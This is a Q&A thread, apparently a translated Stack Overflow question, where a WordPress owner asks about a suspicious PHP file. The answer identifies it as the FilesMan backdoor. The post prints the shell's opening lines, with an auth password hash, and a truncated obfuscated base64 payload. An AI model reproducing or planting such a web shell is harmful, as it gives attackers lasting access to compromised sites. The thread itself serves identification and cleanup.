2014-09-23 199 views
0

今天我檢查了我的wordpress網站,我觀察到一個PHP文件曾在它下面的代碼:奇怪的代碼

根據THIS它是一個編碼(eval64))黑客。下面代碼的含義是什麼? 這與基本編碼eval64黑客相同嗎?

<? 
$auth_pass = "2fba9596aec8aeb14a88461bbd708f97"; 
$color = "#df5"; 
$default_action = 'FilesMan'; 
$default_use_ajax = true; 
$default_charset = 'Windows-1251'; 
$xYEzDu6r3EZT="GR5yYXp3YH17ejRne3h9cGdgdWBxPDB5dX9xYWQ9NG8ZHjQ0NDQweHt4NCk0MzMvGR40NDQ0cntmPDB9KSQvMH00KDRnYGZ4cXo8MHl1f3FhZD0vMH0/KSY9NG8ZHjQ0NDQ0NDB4e3g6KXd8Zjx8cWxwcXc8Z2F2Z2BmPDB5dX9xYWQ4MH04Jj09PS8ZHjQ0NDRpGR40NDQ0ZnFgYWZ6NDB4e3gvGR5pGR4wZ3F9d3t4fXp/KWd7eH1wZ2B1YHE8MyYgIyciciMhIyYiJyIhJ3AiJiIlIyciISciJyAhciIgIiEiJyJyIiAiISYsIXUhLCF1IiwiJiAnIiwicSIhInAidyMhIXUicCMsIiwiICAjISEiciEtInAgIiN1IXUhICEtJyQhLCcmISYidyEtJyYnLSJ2IXUhJyIjInEgcSEjIC0jLCByISMhdScgIichICBwIyMiJSJ2ISUnICF1ICcnLScnIicgICEiICAgcCcnISYhJiImJyQnJScgIHEgISBxISYiJiJxIiwhdSEjISAhJiJ1IXUhLCMkICIhdSEjIHUgIyEiICwhdSchISEicSAlJyQiICAsIiMjIyF1JyUgIiEsIHAidyIsIyciJSEgIXUnJSBxISMidickIichIyAtIyIgcSclICYhISEgInUhdSEsISInJiMsInAhICEhISEnJSBxJycgdSclIiAgJyMgInAiJSMtJy0hJCEtISMgcSB2IScnJicsJyEhJiJ2IncgLCImI3UgIiAsIiYjdSJ3IC0hJyEhIicnJSEtInciIyN1IS0nJiMgI3UiICJwInYnJiE...... 
+1

似乎像來自Rusian黑客的攻擊。在一個月前,我發現我的一個客戶在9個wordpress網站注入了這些代碼。您的代碼似乎未完成。 – 2014-09-23 11:26:29

+0

應該有辦法在服務器中注入這些代碼,找到注入的文件並將其刪除。 – 2014-09-23 11:27:51

+0

取整行'$ xYEzDu6r3EZT =「...」'並使用base64解碼器在線解碼。 – DanFromGermany 2014-09-23 11:27:53

回答

1

上面的代碼是一個非常常見的名爲「FilesMan」的後門腳本。典型的後門腳本是用php編寫的。黑客在他們已經入侵的網站上放置「baskdoor」是很常見的。即使網站所有者更改了帳戶密碼,後門程序也可以讓黑客繼續訪問該網站。後門腳本將從100行代碼到1或2行代碼。

欲瞭解詳情請訪問網站http://aw-snap.info/articles/backdoor-examples.php